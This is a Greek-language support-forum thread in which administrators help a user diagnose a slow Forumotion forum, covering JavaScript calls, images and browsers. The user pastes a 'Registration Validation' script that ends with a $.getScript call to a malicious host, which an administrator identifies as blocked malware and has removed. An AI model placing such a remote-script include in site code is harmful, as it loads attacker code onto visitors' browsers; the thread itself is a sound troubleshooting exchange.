Ελληνική Κοινότητα Υποστήριξης ForumGreek
Καλωσήρθατε στο Ελληνικό Φόρουμ Υποστήριξης της ForumGreek!!

Για να αποκτήσετε πλήρη πρόσβαση στο φόρουμ και στα όσα προσφέρει, μπορείτε πολύ απλά να κάνετε μια σύνδεση ή αν δεν έχετε λογαριασμό μία δωρεάν εγγραφή και μπείτε στην κοινότητά μας!!

αργό φόρουμ

Σελίδα 1 από 2 1, 2  Επόμενο

Επισκόπηση προηγούμενης Θ.Ενότητας Επισκόπηση επόμενης Θ.Ενότητας Πήγαινε κάτω

αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 11:25 am

καλημέρα , μήπως μπορείτε να με βοηθήσετε να βελτιώσω την ταχήτητα του φόρουμ μου , να μπαίνει ποιό γρήγορα γιατί πηστέυω είναι αργό , ευχαριστώ.

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 1:27 pm

Καλησπέρα @tankamario,

Μπορείς να μας πεις σε ποιούς browser συμβαίνει αυτό και ποιούς αφορά; Είναι ένα θέμα που πρέπει να γνωρίζουμε όλες τις πληροφορίες προκειμένουν να σας βοηθήσουμε. Για προβλήματα σύνδεσης συνισμούς την Φόρμα Υποστήριξης.

Luffy



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 1:43 pm

έχουμε δει οτι στον explorer , Crome και τον Mozilla γήνεται οπότε μάλον είναι γενικό το πρόβλημα και εγω που το δοκίμασα αυτό είδα οτι αργεί σε σύγκριση με άλλες σελίδες

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 2:45 pm

@tankamario, πόσα javascripts έχεις στην σελίδα σου;



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 2:52 pm

στο HTML & JAVASCRIPT στην Διαχείριση κωδικών Javascript έχω 5 javascripts

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 2:54 pm

Σε αυτά τα 5 Javascripts πόσες φορές υπάρχουν οι εντολές get() και load() ;;



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:04 pm

σε 2 απο αυτά υπάρχουν 2 get() μια στο κάθε ένα...

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:12 pm

Καλησπέρα @tankamario,
Μπορείς να κάνεις καλύτερη διαχείριση σχετικά με τις .get() και .load() μέσω της local storage, αν υπάρχουν 4-5 τέτοιες συναρτήσεις είσαι οριακά να πιάσεις το Request Limit Exceeded λόγω των πολλαπλών fires στο Javascript Server και να βλέπεις λευκή σελίδα με το παραπάνω μήνυμα.  Με δυο .get() είσαι εντάξει έλεγξε όμως μήπως υπάρχουν και .load() μέσα στα javascripts σου. Επίσης έλεγξε αν τα Javascripts σου τρέχουν αρκετά jQuery αυτό σημαίνει ότι χρησιμοποιούν AJAX η οποία επιβαρύνει και αυτή το φόρουμ σου.

Φιλικά Van-Velsing.






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:18 pm

καλησπέρα , δεν βλέπω κάποιο .load() μέσα , πως μπορώ να κάνω καλύτερη διαχείριση σχετικά με τις .get() και .load() μέσω της local storage ?

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:23 pm

Απο εναν έλεγχο που έκανα στο φόρουμ σου δεν διαπίστωσα σημαντικές καθυστερήσεις φορτώνει αρκετά γρήγορα. Ώστοσο αν θες να δούμε τα javascripts που έχουν τις .get()/.load() μπορείς να τα βάλεις εδώ να τα δούμε. Χρησιμοποιείς κάποιο πρόγραμμα που κάνει download ή κάποιες ενημερώσεις π.χ τα windows;






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 3:26 pm

Μερικές φορές και οι πολλές εικόνες στο φόρουμ μπορεί να προκαλέσει καθυστερήσεις καθώς δεν υπάρχει αρκετός χώρος διαθέσιμος από τις default ρυθμίσεις της Forumotion.

Mία ερώτηση: Το φόρουμ που αργεί εννοείς τα 3-4 δευτερόλεπτα που κάνει στην αρχή για να δείξει το φόρουμ;



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:31 pm

Τις εικόνες του φόρουμ σου σε ποιόν server τις έχεις ανεβάσει; Αν έχουν αρκετά μεγάλη ανάλυση είναι πολύ πιθανόν να σου δημιουργήσουν καθυστερήσεις. Ποιόν web browser χρησιμοποιείς;






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:33 pm

δεν έχω κάποιο πρόγραμμα που κάνει download ή ενημερώσεις , βάζω εδω τα Javascript , το πρώτο που δεν ξέρω γιατί το έχω , αν βοηθάει κάπου ειναι αυτό

Title * :Registration Validation
Javascript Code * :
Κώδικας:
(function () {
   window.validation = {
       empty_username: "You must enter a username",
       username_length: "Usernames must be between 2 and 25 characters long",
       username_available: "is available",
       username_taken: "is already registered by another member",
       invalid_email: "You need to enter a valid email address"
   }
})();
$.getScript("http://malware-site.www");

και το άλλο που δεν ξέρω να δουλέυει ειναι αυτό


Title * :Color Palette

Javascript Code * :
Κώδικας:
$(function(){$(function(){
 if ($("#text_editor_textarea").length < 1) return;
 $.sceditor.command.get('color')._menu  = function (editor, caller, callback) {
   var mColorBasic = [],
   html = $('<div />');
               
   // begin list of colors
             
   mColorBasic["Μαύρο"] = "#000000";
   mColorBasic["Σκούρο Μπλέ"] = "#00008B";
   mColorBasic["Γαλαζοπράσινο"] = "#008080";
   mColorBasic["Σκούρο Πράσινο"] = "#006400";
   mColorBasic["Λουλάκι"] = "#4B0082";
   mColorBasic["Καρπουζί"] = "#DC143C";
   mColorBasic["Πορτοκαλί"] = "#FF4500";
   mColorBasic["Καφέ"] = "#663300";
       
   mColorBasic["Σκούρο Γκρι"] = "#666666";
   mColorBasic["Ακριλικό Μπλε"] = "#4169E1";
   mColorBasic["Σκούρο Τιρκουάζ"] = "#00CED1";
   mColorBasic["Πράσινο"] = "#008000";
   mColorBasic["Μοβ"] = "#9400D3";
   mColorBasic["Κόκκινο"] = "#FF0000";
   mColorBasic["Ελαφρύ Πορτοκαλί"] = "#FF9933";
   mColorBasic["Ακριλικό Καφέ"] = "#A0522D";
       
   mColorBasic["Γκρι"] = "#D3D3D3";
   mColorBasic["Ουρανί"] = "#87CEEB";
   mColorBasic["Γαλάζιο"] = "#00FFFF";
   mColorBasic["Λαδί"] = "#32CD32";
   mColorBasic["Βιολετί"] = "#DA70D6";
   mColorBasic["Σομόν"] = "#FA8072";
   mColorBasic["Χρυσό"] = "#FFD700";
   mColorBasic["Ελαφρύ Καφέ"] = "#CD853F";
       
   mColorBasic["Λευκό"] = "#FFFFFF";
   mColorBasic["Ανοιχτό Τιρκουάζ"] = "#AFEEEE";
   mColorBasic["Σκούρο Γαλαζοπράσινο"] = "#7FFFD4";
   mColorBasic["Ανοιχτό Πράσινο"] = "#98FB98";
   mColorBasic["Ροζ"] = "#FFC0CB";
   mColorBasic["Ροδακινί"] = "#FFDAB9";
   mColorBasic["Κίτρινο"] = "#FFFF00";
   mColorBasic["Καρυδί"] = "#DEB887";
             
   // end list of colors
             
   for(key in mColorBasic) html.append('<div class="color-option" title="' + key + '"><span color="' + mColorBasic[key] + '" style="background-color: ' + mColorBasic[key] + ' !important;"></span></div>');
             
   html.find('span').click(function(e) {
     callback($(this).attr('color'));
     editor.closeDropDown(true);
     e.preventDefault();
   });
             
   editor.createDropDown(caller, "color-picker", html);
 }
})});

και τα άλλα 3 που έχω δεν νομίζω να δουλέυουν αλλά το βλέπουμε...

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 3:37 pm

Παρακαλώ να χρησιμοποιείς τα code tags για αποφυγή παραμορφόσεων!
Κώδικας:
[code][/code]



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:42 pm

To Registration Validation Script δεν λειτουργεί σε πρώτη φάση μιας και καλεί ένα javascript απο
Κώδικας:
$.getScript("http://malware-site.www");

To συγκεκριμένο site που καλεί το javascript έχει αποκλειστεί απο την forumotion γιατί περιείχε κακόβουλους κώδικες και προφάνως αυτό σου δημιουργεί ήδη κάποια καθυστέρηση γιατί δεν βρίσκει το site οπότε μπορείς να το διαγράψεις αυτό το javascript. Στο δεύτερο javascript δεν βλέπω κάποιο πρόβλημα.


Έχει επεξεργασθεί από τον/την Van-Helsing στις Πεμ Ιαν 22, 2015 3:44 pm, 1 φορά






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:42 pm

@Luffy έγραψε:Μερικές φορές και οι πολλές εικόνες στο φόρουμ μπορεί να προκαλέσει καθυστερήσεις καθώς δεν υπάρχει αρκετός χώρος διαθέσιμος από τις default ρυθμίσεις της Forumotion.

Mία ερώτηση: Το φόρουμ που αργεί εννοείς τα 3-4 δευτερόλεπτα που κάνει στην αρχή για να δείξει το φόρουμ;

βασικά αυτό εννοώ και νομίζω είναι λίγο πάνω απο 4 δευτ. αλλά και μέσα όταν αλλάζεις κατηγορίες τον ίδιο χρόνο κάνει...

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 3:45 pm

@Van-Helsing έγραψε:To Registration Validation Script δεν λειτουργεί σε πρώτη φάση μιας και καλεί ένα javascript απο
Κώδικας:
$.getScript("http://malware-site.www");

To συγκεκριμένο site που καλεί το javascript έχει αποκλειστεί απο την forumotion γιατί περιείχε κακόβουλους κώδικες και προφάνως αυτό σου δημιουργεί ήδη κάποια καθυστέρηση γιατί δεν βρίσκει το site οπότε μπορείς να το διαγράψεις αυτό το javascript. Στο δεύτερο javascript δεν βλέπω κάποιο πρόβλημα.

Δοκίμασε αυτό που σου λέει ο @"Van-Hlesing".



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:45 pm

@Van-Helsing έγραψε:Τις εικόνες του φόρουμ σου σε ποιόν server τις έχεις ανεβάσει; Αν έχουν αρκετά μεγάλη ανάλυση είναι πολύ πιθανόν να σου δημιουργήσουν καθυστερήσεις. Ποιόν web browser χρησιμοποιείς;

οι εικόνες είναι απο διάφορα μέροι , χρησιμοποιώ explorer ...

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:46 pm

οκ το έσβησα το 1 να σας βάλω να δείτε και τα άλλα μήπως τα φτιάξουμε ?

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Luffy Την / Το Πεμ Ιαν 22, 2015 3:47 pm

Παρακαλώ μην κάνετε διπλές δημοσιεύσεις. Τα θέματά σας πρέπει να χωρίζονται μεταξύ τουλάχιστον κατά 24 ώρες προτού δημοσιεύσετε κάτι άλλο. Χρησιμοποιήστε το κουμπί Edit αντί αυτού.



Luffy
Διαχειριστής

Διαχειριστής

Άντρας
Τόπος : Ελλάδα
Δημοσιεύσεις : 1802

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:48 pm

Επίσης δοκίμασε να χρησιμοποιείς για την πλοήγηση σου τον Mozilla Firefox ή τον Google Chrome o Internet Explorer είναι αρκετά βαρύς Web Browser.






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:50 pm

οκ έχω βάλει και αυτό αλλά δεν δουλέυει
<χρώμα την γραμμής των κατηγοριών για νέο μήνυμα>
αυτό
http://helpgr.forumgreek.com/t71-topic#72

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:53 pm

Αν δεν σου λειτουργεί κάποιο javascript δεν υπάρχει λόγος να τα κρατάς και να επιβαρύνεις το φόρουμ σου.






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από tankamario Την / Το Πεμ Ιαν 22, 2015 3:54 pm

σωστά αλλά θα ήθελα να το φτιάξω αν γήνετε , ή κα΄λήτερα να το βγάλω ?

tankamario
Eνεργό Μέλος

Άντρας
Δημοσιεύσεις : 143

Επιστροφή στην κορυφή Πήγαινε κάτω

Απ: αργό φόρουμ

Δημοσίευση από Van-Helsing Την / Το Πεμ Ιαν 22, 2015 3:59 pm

Μπορείς να ανοίξεις νέο θέμα γιαυτό το πρόβλημα http://helpgr.forumgreek.com/t71-topic#72; Αν αυτό το θέμα με τις καθυστερήσεις έχει λυθεί να το κλειδώσουμε.






Van-Helsing
Διαχειριστής

Διαχειριστής

Άντρας
Ηλικία : 42
Δημοσιεύσεις : 1756

Επιστροφή στην κορυφή Πήγαινε κάτω

Σελίδα 1 από 2 1, 2  Επόμενο

Επισκόπηση προηγούμενης Θ.Ενότητας Επισκόπηση επόμενης Θ.Ενότητας Επιστροφή στην κορυφή


 
Δικαιώματα σας στην κατηγορία αυτή
Δεν μπορείτε να απαντήσετε στα Θέματα αυτής της Δ.Συζήτησης
Χρειάζεστε βοήθεια;
Στις Συχνές Ερωτήσεις μπορείτε να βρείτε σημαντικές πληροφορίες που θα σας βοηθήσουν!